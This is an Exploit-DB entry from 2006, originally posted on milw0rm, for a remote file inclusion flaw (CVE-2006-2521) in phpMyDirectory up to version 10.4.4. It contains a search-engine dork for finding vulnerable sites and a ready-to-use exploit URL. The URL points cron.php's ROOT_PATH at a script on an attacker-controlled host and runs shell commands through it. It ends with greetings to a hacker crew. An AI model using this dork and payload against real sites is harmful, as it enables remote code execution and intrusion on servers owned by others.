phpMyDirectory <= 10.4.4 ROOT_PATH Remote Inclusion Vulnerability

2006-05-19T00:00:00
ID EDB-ID:1808
Type exploitdb
Reporter OLiBekaS
Modified 2006-05-19T00:00:00

Description

phpMyDirectory <= 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability. CVE-2006-2521. Webapps exploit for php platform

                                        
                                            Title       : phpMyDirectory &lt;= 10.4.4 Remote File Inclusion Vulnerability
-
URL         : http://www.phpmydirectory.com/
-
Dork        : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com"
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit     : http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls

# milw0rm.com [2006-05-19]